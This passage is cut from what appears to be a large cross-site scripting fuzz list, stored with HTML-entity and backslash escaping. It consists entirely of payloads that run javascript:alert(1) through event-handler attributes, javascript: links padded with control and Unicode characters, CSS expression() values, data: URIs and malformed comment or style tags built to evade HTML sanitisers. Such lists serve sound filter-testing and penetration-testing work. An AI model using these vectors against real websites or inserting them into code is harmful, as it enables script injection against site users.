onError=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/object onError&gt;\\r\\n&lt;body onPopState body onPopState=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onPopState&gt;\\r\\n&lt;html onMouseMove html onMouseMove=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onMouseMove&gt;\\r\\n&lt;applet onreadystatechange applet onreadystatechange=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/applet onreadystatechange&gt;\\r\\n&lt;body onpagehide body onpagehide=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onpagehide&gt;\\r\\n&lt;svg onunload svg onunload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/svg onunload&gt;\\r\\n&lt;applet onerror applet onerror=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/applet onerror&gt;\\r\\n&lt;body onkeyup body onkeyup=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onkeyup&gt;\\r\\n&lt;body onunload body onunload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onunload&gt;\\r\\n&lt;iframe onload iframe onload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/iframe onload&gt;\\r\\n&lt;body onload body onload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onload&gt;\\r\\n&lt;html onmouseover html onmouseover=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onmouseover&gt;\\r\\n&lt;object onbeforeload object onbeforeload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/object onbeforeload&gt;\\r\\n&lt;body onbeforeunload body onbeforeunload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onbeforeunload&gt;\\r\\n&lt;body onfocus body onfocus=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onfocus&gt;\\r\\n&lt;body onkeydown body onkeydown=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onkeydown&gt;\\r\\n&lt;iframe onbeforeload iframe onbeforeload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/iframe onbeforeload&gt;\\r\\n&lt;iframe src iframe src=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/iframe src&gt;\\r\\n&lt;svg onload svg onload=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/svg onload&gt;\\r\\n&lt;html onmousemove html onmousemove=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/html onmousemove&gt;\\r\\n&lt;body onblur body onblur=\\\&quot;javascript:javascript:alert(1)\\\&quot;&gt;&lt;/body onblur&gt;\\r\\n\\\\x3Cscript&gt;javascript:alert(1)&lt;/script&gt;\\r\\n\\\&#039;\\\&quot;`&gt;&lt;script&gt;/* *\\\\x2Fjavascript:alert(1)// */&lt;/script&gt;\\r\\n&lt;script&gt;javascript:alert(1)&lt;/script\\\\x0D\\r\\n&lt;script&gt;javascript:alert(1)&lt;/script\\\\x0A\\r\\n&lt;script&gt;javascript:alert(1)&lt;/script\\\\x0B\\r\\n&lt;script charset=\\\&quot;\\\\x22&gt;javascript:alert(1)&lt;/script&gt;\\r\\n&lt;!--\\\\x3E&lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;\\r\\n--&gt;&lt;!-- ---&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;\\r\\n--&gt;&lt;!-- --\\\\x00&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;\\r\\n--&gt;&lt;!-- --\\\\x21&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;\\r\\n--&gt;&lt;!-- --\\\\x3E&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=\\\&#039;#\\\\x27 onerror=javascript:alert(1)&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x3Ajavascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n\\\&quot;\\\&#039;`&gt;&lt;p&gt;&lt;svg&gt;&lt;script&gt;a=\\\&#039;hello\\\\x27;javascript:alert(1)//\\\&#039;;&lt;/script&gt;&lt;/p&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x00cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x07cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x0Dcript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x0Acript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x08cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x02cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x03cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x04cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x01cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x05cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x0Bcript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x09cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x06cript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javas\\\\x0Ccript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;script&gt;/* *\\\\x2A/javascript:alert(1)// */&lt;/script&gt;\\r\\n&lt;script&gt;/* *\\\\x00/javascript:alert(1)// */&lt;/script&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x3E&lt;img src=\\\&quot;about:blank\\\&quot; onerror=javascript:alert(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x0D&lt;img src=\\\&quot;about:blank\\\&quot; onerror=javascript:alert(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x09&lt;img src=\\\&quot;about:blank\\\&quot; onerror=javascript:alert(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x20&lt;img src=\\\&quot;about:blank\\\&quot; onerror=javascript:alert(1)//&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x0A&lt;img src=\\\&quot;about:blank\\\&quot; onerror=javascript:alert(1)//&gt;&lt;/style&gt;\\r\\n\\\&quot;\\\&#039;`&gt;ABC&lt;div style=\\\&quot;font-family:\\\&#039;foo\\\&#039;\\\\x7Dx:expression(javascript:alert(1);/*\\\&#039;;\\\&quot;&gt;DEF \\r\\n\\\&quot;\\\&#039;`&gt;ABC&lt;div style=\\\&quot;font-family:\\\&#039;foo\\\&#039;\\\\x3Bx:expression(javascript:alert(1);/*\\\&#039;;\\\&quot;&gt;DEF \\r\\n&lt;script&gt;if(\\\&quot;x\\\\\\\\xE1\\\\x96\\\\x89\\\&quot;.length==2) { javascript:alert(1);}&lt;/script&gt;\\r\\n&lt;script&gt;if(\\\&quot;x\\\\\\\\xE0\\\\xB9\\\\x92\\\&quot;.length==2) { javascript:alert(1);}&lt;/script&gt;\\r\\n&lt;script&gt;if(\\\&quot;x\\\\\\\\xEE\\\\xA9\\\\x93\\\&quot;.length==2) { javascript:alert(1);}&lt;/script&gt;\\r\\n\\\&#039;`\\\&quot;&gt;&lt;\\\\x3Cscript&gt;javascript:alert(1)&lt;/script&gt;\\r\\n\\\&#039;`\\\&quot;&gt;&lt;\\\\x00script&gt;javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;\\\&#039;`&gt;&lt;\\\\x3Cimg src=xxx:x onerror=javascript:alert(1)&gt;\\r\\n\\\&quot;\\\&#039;`&gt;&lt;\\\\x00img src=xxx:x onerror=javascript:alert(1)&gt;\\r\\n&lt;script src=\\\&quot;data:text/plain\\\\x2Cjavascript:alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script src=\\\&quot;data:\\\\xD4\\\\x8F,javascript:alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script src=\\\&quot;data:\\\\xE0\\\\xA4\\\\x98,javascript:alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script src=\\\&quot;data:\\\\xCB\\\\x8F,javascript:alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script\\\\x20type=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x3Etype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Dtype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x09type=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Ctype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x2Ftype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\n&lt;script\\\\x0Atype=\\\&quot;text/javascript\\\&quot;&gt;javascript:alert(1);&lt;/script&gt;\\r\\nABC&lt;div style=\\\&quot;x\\\\x3Aexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:expression\\\\x5C(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:expression\\\\x00(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:exp\\\\x00ression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:exp\\\\x5Cression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x0Aexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x09expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE3\\\\x80\\\\x80expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x84expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xC2\\\\xA0expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x80expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x8Aexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x0Dexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x0Cexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x87expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xEF\\\\xBB\\\\xBFexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x20expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x88expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x00expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x8Bexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x86expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x85expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x82expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\x0Bexpression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x81expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x83expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\nABC&lt;div style=\\\&quot;x:\\\\xE2\\\\x80\\\\x89expression(javascript:alert(1)\\\&quot;&gt;DEF\\r\\n&lt;a href=\\\&quot;\\\\x0Bjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x0Fjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xC2\\\\xA0javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x05javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE1\\\\xA0\\\\x8Ejavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x18javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x11javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x88javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x89javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x80javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x17javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x03javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x0Ejavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Ajavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x00javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x10javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x82javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x20javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x13javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x09javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x8Ajavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x14javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x19javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\xAFjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Fjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x81javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Djavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x87javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x07javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE1\\\\x9A\\\\x80javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x83javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x04javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x01javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x08javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x84javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x86javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE3\\\\x80\\\\x80javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x12javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x0Djavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x0Ajavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x0Cjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x15javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\xA8javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x16javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x02javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Bjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x06javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\xA9javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x80\\\\x85javascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Ejavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\xE2\\\\x81\\\\x9Fjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;\\\\x1Cjavascript:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x00:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x3A:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x09:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x0D:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n&lt;a href=\\\&quot;javascript\\\\x0A:javascript:alert(1)\\\&quot; id=\\\&quot;fuzzelement1\\\&quot;&gt;test&lt;/a&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x0Aonerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x22onerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x0Bonerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x0Donerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x2Fonerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x09onerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x0Conerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x00onerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x27onerror=javascript:alert(1)&gt;\\r\\n`\\\&quot;\\\&#039;&gt;&lt;img src=xxx:x \\\\x20onerror=javascript:alert(1)&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x3Bjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x0Djavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xEF\\\\xBB\\\\xBFjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x81javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x84javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE3\\\\x80\\\\x80javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x09javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x89javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x85javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x88javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x00javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\xA8javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x8Ajavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE1\\\\x9A\\\\x80javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x0Cjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x2Bjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xF0\\\\x90\\\\x96\\\\x9Ajavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;-javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x0Ajavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\xAFjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x7Ejavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x87javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x81\\\\x9Fjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\xA9javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xC2\\\\x85javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xEF\\\\xBF\\\\xAEjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x83javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x8Bjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xEF\\\\xBF\\\\xBEjavascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x80javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\x21javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&gt;&lt;script&gt;\\\\xE2\\\\x80\\\\x82javascript:alert(1)&lt;/script&gt;\\r\\n\\\&quot;`\\\&#039;&